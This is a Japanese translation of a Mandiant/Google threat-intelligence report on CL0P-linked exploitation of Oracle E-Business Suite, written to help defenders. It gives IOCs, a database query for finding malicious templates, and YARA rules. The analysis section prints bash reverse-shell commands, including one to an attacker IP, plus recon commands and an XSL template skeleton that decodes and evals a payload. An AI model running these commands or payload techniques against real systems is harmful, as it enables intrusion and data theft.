脅威インテリジェンス

Oracle E-Business Suite のゼロデイが広範囲にわたる恐喝キャンペーンで悪用される

2025年10月30日

Mandiant

Google Threat Intelligence Group

※この投稿は米国時間 2025 年 10 月 10 日に、Google Cloud blog に投稿されたものの抄訳です。

はじめに

2025 年 9 月 29 日より、Google Threat Intelligence Group（GTIG）と Mandiant は、CL0P 恐喝ブランドとの関連を主張する脅威アクターによる、新たな大規模恐喝キャンペーンの追跡を開始しました。脅威アクターは、多数の組織の経営幹部に対して、被害者の Oracle E-Business Suite（EBS）環境から機密データが盗まれたと主張する大量のメールを送信し始めました。2025 年 10 月 2 日、Oracle は脅威アクターが 2025 年 7 月にパッチが適用された脆弱性を悪用した可能性があると報告し、最新の重要なパッチのアップデートを適用するよう顧客に推奨しました。2025 年 10 月 4 日、Oracle はこの脆弱性に対処するために緊急パッチを適用するよう顧客に指示し、すべて重要なパッチのアップデートを最新の状態に保つという推奨事項を改めて伝えました。

Google の分析によると、CL0P の恐喝キャンペーンは、EBS の顧客の環境を標的とした侵入活動が数か月にわたって行われた後に実施されました。脅威アクターは、2025 年 8 月 9 日という早い時期に、Oracle EBS の顧客に対するゼロデイ脆弱性として CVE-2025-61882 を悪用しました。これは、パッチが利用可能になる数週間前のことであり、さらに遡ると 2025 年 7 月 10 日から不審な活動が確認されています。場合によっては、脅威アクターが影響を受けた組織から大量のデータを盗み出すことに成功しています。

この投稿では、キャンペーンの詳細な分析、脅威アクターが Oracle EBS を侵害するために使用した多段階の Java インプラントフレームワークの解体、以前の悪用活動の詳細、防御者向けの実行可能なガイダンスとセキュリティ侵害インジケーター（IOC）を提供します。

背景

CL0P（別名 CL0P^_- LEAKS）のデータ漏洩サイト（DLS）は 2020 年に開設されました。当初、GTIG は CL0P ランサムウェアを含む多面的な恐喝行為に使用され、FIN11 に起因する DLS を観測しました。最近では、被害者とされている組織の大部分が、Accellion の旧式のファイル転送アプライアンス（FTA）、GoAnywhere MFT、MOVEit MFT、Cleo LexiCom などのマネージドファイル転送（MFT）システムにおけるゼロデイ脆弱性の大規模な悪用から生じた、データ窃盗による恐喝インシデントに関連しているようです。これらのインシデントのほとんどで、脅威アクターはゼロデイ脆弱性を大規模に悪用し、被害者のデータを盗み、数週間後に恐喝を試みました。このデータ窃取による恐喝活動は、FIN11 とその疑いのある脅威クラスタによるものとされていることが多く、CL0P ランサムウェアと CL0P DLS が、少なくとも 1 つの脅威アクターによって、異なる戦術、手法、手順（TTP）で使用されている証拠も確認されています。これは、FIN11 がメンバーシップやパートナーシップを拡大してきたことを示唆している可能性があります。

Oracle EBS を標的とした今回の最新のキャンペーンは、この成功を収めた、大きな影響力を持つ脅威が今後も継続することを意味します。

https://storage.googleapis.com/gweb-cloudblog-publish/images/oracle-cl0p-fig1.max-1800x1800.png

図 1: 10 月 8 日に更新された CL0P DLS サイト

脅威の詳細

CL0P の恐喝キャンペーン

2025 年 9 月 29 日以降、脅威アクターは、数千とは言わないまでも数百の侵害されたサードパーティアカウントから大量のメールキャンペーンを開始しました。これらの（さまざまな無関係の組織に属する）アカウント認証情報は、アンダーグラウンドフォーラムで販売されている情報窃取型マルウェアのログから入手された可能性が高いと考えられます。これは、脅威アクターが正当性を加え、スパムフィルタを回避するために使用する一般的な戦術です。組織の経営幹部に送信されたメールで、脅威アクターは Oracle EBS アプリケーションを侵害してドキュメントを流出させたと主張していました。

特に、メールには support@pubstorm.com と support@pubstorm.net の 2 つの連絡先アドレスが含まれており、これらは少なくとも 2025 年 5 月から CL0P DLS に記載されています。脅威アクターは、主張を裏付けるために、被害者の EBS 環境からの正当なファイルリストを複数の組織に提供しており、そのデータは 2025 年 8 月中旬にまで遡ります。恐喝メールでは、被害者とされる人物が、盗まれたデータの公開を阻止するために支払いを行うことができると示されていますが、金額と方法は指定されていません。これは、最新の恐喝行為の典型的なパターンです。通常、被害者が脅威アクターに連絡し、交渉する権限があることを示すと、要求が提示されます。

現在までに、GTIG はこのキャンペーンの被害者が CL0P DLS に掲載されていることを確認していません。これは、CL0P ブランドが関与した過去のキャンペーンと一致しています。過去のキャンペーンでは、脅威アクターは通常、被害者のデータを投稿するまでに数週間待っていました。

https://storage.googleapis.com/gweb-cloudblog-publish/images/oracle-cl0p-fig2.max-1500x1500.png

図 2: 被害者である経営幹部に送信された恐喝メール

技術分析: エクスプロイトの解体

最近の恐喝キャンペーンに先立って、Oracle E-Business Suite（EBS）サーバーを標的とした悪用活動が確認されています。この活動は、2025 年 7 月に遡る可能性があります。

Oracle は 10 月 4 日に、UiServlet コンポーネントを標的とした漏洩エクスプロイトチェーンを参照する CVE-2025-61882 のパッチをリリースしましたが、Mandiant は Oracle EBS を含む複数の異なるエクスプロイトチェーンを観測しており、10 月 2 日に既知の脆弱性が悪用されていることを最初に示唆したアドバイザリの根拠となったのは、別のチェーンである可能性が高いです。CVE-2025-61882 に対応する具体的な脆弱性 / エクスプロイトチェーンは現在不明ですが、GTIG は、10 月 4 日にリリースされたパッチを通じて更新された Oracle EBS サーバーは、既知のエクスプロイトチェーンに対して脆弱ではなくなっている可能性が高いと評価しています。

2025 年 7 月のアクティビティ: 「UiServlet」に関連する不審なアクティビティ

Mandiant のインシデント対応担当者は、2025 年 7 月に Oracle EBS サーバーを標的とした活動を特定しました。アプリケーションログから、/OA_HTML/configurator/UiServlet を標的とした悪用が示唆されました。Mandiant の調査で回収されたアーティファクトは、2025 年 10 月 3 日に「SCATTERED LAPSUS$ HUNTERS」という Telegram グループで漏洩されたエクスプロイトと一部重複しています。しかし、GTIG は、2025 年 7 月に確認された活動とこのエクスプロイトの使用を直接関連付ける十分な証拠を欠いています。現時点では、GTIG は UNC6240（別名「Shiny Hunters」）に関連する脅威アクターがこの悪用活動に関与したとは評価していません。

watchTowr Labs が分析したところ、漏洩したエクスプロイトは、サーバーサイドリクエストフォージェリ（SSRF）、キャリッジリターンラインフィード（CRLF）インジェクション、認証バイパス、XSL テンプレートインジェクションなど、いくつかの異なるプリミティブを組み合わせて、標的の Oracle EBS サーバーでリモートコード実行を実現します。前述のように、このチェーンで悪用された脆弱性のいずれに対応する CVE も不明です。悪用後に実行されるコマンドは、Linux では sh、Windows では cmd.exe を使用します。
漏洩したエクスプロイトアーカイブには、Bash リバースシェルを実行するために使用するサンプル呼び出しが含まれており、コマンドは bash -i >& /dev/tcp/<ip>/<port> 0>&1 のような構造になっています。

2025 年 7 月のパッチリリース前に確認されたアクティビティ

2025 年 7 月 10 日、2025 年 7 月の Oracle EBS セキュリティアップデートのリリースに先立ち、Mandiant は 200.107.207.26 からの不審な HTTP トラフィックを特定しました。GTIG はこのアクティビティの正確な性質を確認できませんでしたが、Oracle EBS サーバーの悪用を試みた初期の試みであった可能性はあります。しかし、流出したエクスプロイトで実行されたリモート XSL ペイロード取得と一致するアウトバウンド HTTP トラフィックを示すフォレンジック証拠は得られず、不審なコマンドの実行も確認されなかったため、これが実際の悪用試行であると評価することはできませんでした。

また、インターネットスキャンデータから、前述の活動とほぼ同時期に Python AIOHTTP サーバーを公開しているサーバーが確認されました。これは、公開された漏洩エクスプロイトでコールバックサーバーが使用されていることと一致します。

2025 年 7 月のパッチリリース後に確認されたアクティビティ

パッチがリリースされた後、Mandiant は、161.97.99.49 から Oracle EBS サーバーに対する悪用を試みる可能性のある試みを観測し、/OA_HTML/configurator/UiServlet への HTTP リクエストを記録しました。特に、EBS に関するさまざまなログから、これらのリクエストの一部がタイムアウトしたことが示されています。これは、漏洩した公開エクスプロイトに存在する SSRF 脆弱性、またはリクエストを完全に終了するはずの後続のアクティビティが失敗した可能性があることを示唆しています。これらのエラーは、2025 年 7 月のパッチリリース前に記録されたアクティビティでは確認されていません。

GTIG は現在、これらの 2 つの活動が同じ脅威アクターによって行われたものかどうかを確認できていません。

2025 年 8 月の活動: 「SyncServlet」を標的とするエクスプロイトチェーン

2025 年 8 月、脅威アクターが SyncServlet コンポーネントの脆弱性を悪用し始め、認証されていないリモートコード実行が可能になりました。このアクティビティは、前述のアクティビティで確認された 200.107.207.26 を含む複数の脅威アクターのサーバーから発生しました。

悪用フロー: 攻撃は、/OA_HTML/SyncServlet への POST リクエストで開始されます。その後、脅威アクターは XDO テンプレートマネージャー機能を使用して、EBS データベース内に新しい悪意のあるテンプレートを作成します。悪用の最終段階は、テンプレートのプレビュー機能でペイロードをトリガーするリクエストです。次のエンドポイントへのリクエストは、高い忠実度でセキュリティ侵害インジケーターを示しています。

/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=<TMP|DEF><16_RANDOM_HEX_STRING>&TemplateType=<XSL-TEXT|XML>…

悪意のあるペイロードは、XDO_TEMPLATES_B データベーステーブルに新しいテンプレートとして保存されます。テンプレート名（TemplateCode）は、常に TMP または DEF で始まり、TemplateType はそれぞれ XSL-TEXT または XML に設定されます。以下は、Base64 ペイロードが編集された状態でデータベースに保存されたペイロードの例です。

<?xml version="1.0" encoding="UTF-8"?>
    <xsl:stylesheet version="1.0"
                    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                    xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
                    xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
                    xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
                    xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String">
        <xsl:template match="/">
            <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'<BASE64STRING>')"/>
            <xsl:variable name="js" select="str:new($bs)"/>
            <xsl:variable name="m" select="jsm:new()"/>
            <xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
            <xsl:variable name="code" select="eng:eval($e, $js)"/>
            <xsl:value-of select="$code"/>
        </xsl:template>
    </xsl:stylesheet>

注目すべきは、この XSL ペイロードの構造が、以前に説明した Oracle EBS 漏洩エクスプロイトの XSL ペイロードと同一であることです。

GTIG は、XSL ペイロードに埋め込まれた Java ペイロードのチェーンを少なくとも 2 つ特定しています。その一部はこちらでも説明されています。

GOLDVEIN.JAVA - ダウンローダー: GOLDVEIN の Java バリアント。攻撃者が制御するコマンド＆コントロール（C2 または C&C）IP アドレスにリクエストを送信して、第 2 段階のペイロードを取得して実行するダウンローダーです。このビーコンは「TLSv3.1」ハンドシェイクを装っており、HTML コメント内で HTTP レスポンスとして実行結果を脅威アクターに返すロギング機能が含まれています。現時点では、GOLDVEIN.JAVA によってダウンロードされた後続のペイロードは Mandiant によって復元されていません。

GOLDVEIN はもともと PowerShell で記述されており、2024 年 12 月に UNC5936 として追跡されている FIN11 の脅威クラスタと疑われるグループが、複数の Cleo ソフトウェア製品のエクスプロイトキャンペーンで初めて確認されました。

SAGE* 感染チェーン: 複数の Java ペイロードがネストされたチェーン。/help/state/content/destination./navId.1/navvSetId.iHelp/ を含むエンドポイントへのリクエストを監視する永続的なフィルタが作成され、追加の Java ペイロードがデプロイされます。

XSL ペイロードには、Base64 でエンコードされた SAGEGIFT ペイロードが含まれています。SAGEGIFT は、Oracle WebLogic サーバー向けに作成されたカスタムの Java リフレクティブクラスローダです。
SAGEGIFT は、Oracle WebLogic サーブレットフィルタをリフレクティブに読み込むための公開コードをベースとしたインメモリドロッパーである SAGELEAF の読み込みに使用されます。SAGELEAF には、追加のロギングコードが埋め込まれています。SAGELEAF のログは、それを読み込んだ親の SAGEGIFT ペイロードによって取得され、HTML コメント内の HTTP レスポンスで脅威アクターに返される可能性があります（GOLDVEIN.JAVA と同じ構造）。
SAGELEAF は、SAGEWAVE をインストールするために使用されます。SAGEWAVE は、脅威アクターが Java クラスを含む AES で暗号化された ZIP アーカイブをデプロイできるようにする、悪意のある Java サーブレットフィルタです。Google の分析によると、SAGEWAVE のメインペイロードは GOLDTOMB の Cli モジュールに似ている可能性がありますが、現時点ではこの最終段階を直接確認していません。

Mandiant は、SAGEWAVE のバリアントを観測しています。このバリアントでは、リクエストペイロードを処理するために、HTTP ヘッダー X-ORACLE-DMS-ECID を特定のハードコードされた値に設定する必要があります。また、リクエストのフィルタリングに使用されるさまざまな HTTP パスも確認されており、その中には /support/state/content/destination./navId.1/navvSetId.iHelp/ も含まれています。

https://storage.googleapis.com/gweb-cloudblog-publish/images/oracle-cl0p-fig3.max-2100x2100.png

図 3: SAGE* の感染チェーン / トリガーの図

悪用が成功した後、脅威アクターは EBS アカウント「applmgr」から偵察コマンドを実行していることが確認されています。これらのコマンドには次のものがあります。

cat /etc/fstab
cat /etc/hosts
df -h
ip addr
cat /proc/net/arp

/bin/bash -i >& /dev/tcp/200.107.207.26/53 0>&1
arp -a
ifconfig
netstat -an
ping 8.8.8.8 -c 2
ps -aux

さらに、Mandiant は、脅威アクターが bash -i を使用して Java（GOLDVEIN.JAVA の第 2 段階ペイロードを実行する EBS プロセス）から追加の bash プロセスを起動し、新たに起動した bash プロセスからさまざまなコマンドを実行していることを確認しました。EBS アカウント「applmgr」として実行されている Java によって起動された bash -i プロセスのすべての子プロセスは、脅威アクターのコマンドを特定するハンティングの一環として確認する必要があります。

帰属: 確認済みおよび疑わしい FIN11 アクティビティと重複

GTIG は現時点では、このアクティビティを追跡対象の脅威グループに正式に帰属させていません。しかし、2025 年 5 月以降、CL0P DLS に記載されている連絡先アドレス（support@pubstorm.com と support@pubstorm.net）を含む、CL0P 恐喝ブランドの使用は注目に値します。GTIG は当初、CL0P ランサムウェアが関与し、FIN11 に帰属する多面的な恐喝行為に使用された DLS を観測しました。最近では、被害者とされる組織の大部分が、FIN11 や、FIN11 の脅威クラスタが頻繁に利用しているとされているマネージドファイル転送（MFT）システムの悪用から生じたデータ窃取による恐喝事件に関連しているようです。しかし、CL0P ランサムウェアと CL0P DLS が FIN11 によって独占的に使用されているわけではないという証拠も確認されており、この要素のみに基づいて帰属を判断することはできません。

CL0P との重複に加えて、ポストエクスプロイトツールには、以前に FIN11 のキャンペーンで使用されたと疑われるマルウェアとの論理的な類似性が見られます。具体的には、2 次ステージのペイロードを取得するインメモリの Java ベースのローダ GOLDVEIN.JAVA の使用は、2024 年後半に Cleo MFT の脆弱性が大規模に悪用された際に、FIN11 のクラスタ UNC5936 が展開したと思われる GOLDVEIN ダウンローダと GOLDTOMB バックドアを彷彿とさせます。さらに、最近の恐喝メールの送信に使用された侵害されたアカウントの 1 つは、以前は FIN11 によって使用されていました。継続的な分析により、この最近の活動と他の脅威クラスタ（FIN11 や UNC5936 など）との関係について、さらに詳細が明らかになる可能性があります。

影響

広く使用されている企業向けアプリケーションのゼロデイ脆弱性を悪用し、数週間後に大規模なブランド化された恐喝キャンペーンを行うというパターンは、FIN11 に起因するとされてきた活動の特徴であり、他の脅威アクターにも魅力的な戦略的メリットがあります。脅威アクターはラテラルムーブメントに時間とリソースを費やす必要がないため、機密データを保存する一般公開アプリケーションやアプライアンスを標的にすることで、データ窃盗の効率が向上する可能性があります。脅威アクターがゼロデイ脆弱性を利用し、ネットワークフットプリントを制限し、恐喝通知を遅らせるという全体的なアプローチは、脅威アクターが防御者に気づかれることなく多数の組織からデータを流出させることができる可能性があることを考えると、全体的な影響をほぼ確実に増大させます。CL0P に関連する脅威アクターは、少なくとも 2020 年後半からこのアプローチを採用していることから、これらの大規模な悪用キャンペーンを成功と認識していることはほぼ確実です。そのため、少なくとも短期的には、同様のアプリケーションのゼロデイエクスプロイトの取得にリソースを投入し続けると予想されます。

推奨事項

GTIG と Mandiant は、このアクティビティによってもたらされる脅威を軽減および検出し、Oracle E-Business Suite 環境を強化するために、次のアクションを推奨しています。

緊急パッチを直ちに適用する: 2025 年 10 月 4 日にリリースされた Oracle EBS パッチの適用を優先し、説明した悪用活動（CVE-2025-61882）を軽減します。この脆弱性は実際に悪用されているため、初期アクセスを防ぐには、このステップが最も重要です。
データベース内の悪意のあるテンプレートを検出する: 脅威アクターは、ペイロードを EBS データベースに直接保存します。管理者は、XDO_TEMPLATES_B テーブルと XDO_LOBS テーブルをすぐにクエリして、悪意のあるテンプレートを特定する必要があります。TEMPLATE_CODE が TMP または DEF で始まるテンプレートを確認します。ペイロードは LOB_CODE 列に保存されます。

SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC;
SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;

- アウトバウンドのインターネットアクセスを制限する: 観測された Java ペイロードでは、第 2 段階のインプラントを取得したり、データを流出させたりするために、C2 サーバーへのアウトバウンド接続が必要です。EBS サーバーからインターネットへの不要なアウトバウンドトラフィックをすべてブロックします。これは、サーバーが侵害された場合でも攻撃チェーンを中断できる補完的コントロールです。
- ネットワークログのモニタリングと分析を行う: 侵害の兆候をモニタリングします。TMP または DEF で始まる TemplateCode を含む TemplatePreviewPG エンドポイントへのリクエストは、悪用を試みていることを強く示しています。また、/OA_HTML/configurator/UiServlet と /OA_HTML/SyncServlet への異常なリクエストを調査します。
- メモリフォレンジックを活用する: このキャンペーンで使用されるインプラントは主に Java ベースで、メモリ内で実行されます。侵害が疑われる場合は、EBS アプリケーションに関連付けられた Java プロセスのメモリ分析により、ディスク上に存在しない悪意のあるコードやアーティファクトが明らかになる可能性があります。
セキュリティ侵害インジケーター

登録済みユーザーの方は、Google Threat Intelligence（GTI）コレクションで以下のセキュリティ侵害インジケーターを利用できます。

タイプ	インジケーター	説明
ネットワーク	200.107.207.26	UiServlet コンポーネントと SyncServlet コンポーネントを標的とした悪用試行で確認された IP アドレス。
ネットワーク	161.97.99.49	UiServlet コンポーネントを標的とした悪用試行で確認された IP アドレス。
ネットワーク	162.55.17.215:443	GOLDVEIN.JAVA C2
ネットワーク	104.194.11.200:443	GOLDVEIN.JAVA C2
ネットワーク	/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG...	悪意のある XSL ペイロードをトリガーしようとしたことを示すインジケーター。TemplateCode が TMP または DEF で始まるリクエストを探します。
ネットワーク	/OA_HTML/configurator/UiServlet	2025 年 7 月の悪用活動で標的とされたエンドポイント。
ネットワーク	/OA_HTML/SyncServlet	2025 年 8 月の悪用活動で標的とされたエンドポイント。
ネットワーク	/help/state/content/destination./navId.1/navvSetId.iHelp/	SAGEWAVE でフィルタリングされる HTTP パスの部分文字列
ネットワーク	/support/state/content/destination./navId.1/navvSetId.iHelp/	SAGEWAVE でフィルタリングされる HTTP パスの部分文字列
メールアドレス	support@pubstorm.com	CL0P の恐喝メールで使用され、グループのデータ漏洩サイトに記載されている連絡先アドレス。
メールアドレス	support@pubstorm.net	CL0P の恐喝メールで使用され、グループのデータ漏洩サイトに記載されている連絡先アドレス。

YARA ルール

rule G_Downloader_GOLDVEIN_JAVA_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$chunk1 = "175,121,73" base64
		$chunk2 = "249,254,255" base64
		$chunk3 = "235,176,29" base64
		$chunk4 = "242,61,32" base64
		$chunk5 = "189,66,134" base64
		$str1 = "java.net.Socket(h,443)" base64
		$str2 = "TLSv3.1" base64
		$decoded1 = "[175,121,73,249,254,255,235,176,29,242,61,32,189,66,134,102,56,208,18,10,132,242,223,202,90,97,118,3,83,136,84,213]"
		$decoded2 = "java.net.Socket(h,443)"
		$decoded3 = "TLSv3.1"
	condition:
		(3 of ($chunk*) and all of ($str*)) or all of ($decoded*)
}

rule G_Dropper_SAGEGIFT_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "ServletRequestImpl" base64
		$str2 = "getServletRequest" base64
		$str3 = "ServletResponseImpl" base64
		$str4 = "dc=cl.getDeclaredMethod('defineClass',[cb,ci,ci])" base64
		$decoded1 = "ServletRequestImpl"
		$decoded2 = "getServletRequest"
		$decoded3 = "ServletResponseImpl"
		$decoded4 = "dc=cl.getDeclaredMethod('defineClass',[cb,ci,ci])"
	condition:
		all of ($str*) or all of ($decoded*)
}

rule G_Dropper_SAGELEAF_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$log1 = "n1=%d n2=%d"
		$log2 = "ctx.l=%d"
		$log3 = "Filter=" fullword
		$pat = "/help/*"
		$s1 = "weblogic.t3.srvr.ServerRuntime"
		$s2 = "gzipDecompress"
		$s3 = "BASE64Decoder"
		$s4 = "getDeclaredMethod"
	condition:
		2 of ($log*) and 5 of them
}

rule G_Launcher_SAGEWAVE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Log4jConfigQpgsubFilter"
		$s2 = ".Cli" fullword
		$s3 = "httpReq" fullword
		$s4 = "AES/CBC/NoPadding"
		$s5 = "javax/servlet/FilterChain"
		$s6 = "java/lang/reflect/Method"
	condition:
		4 of ($s*) and filesize < 1MB
}

-Mandiant、Google Threat Intelligence Group

-執筆者: Peter Ukhanov、Genevieve Stark、Zander Work、Ashley Pearson、Josh Murchie、Austin Larsen

投稿先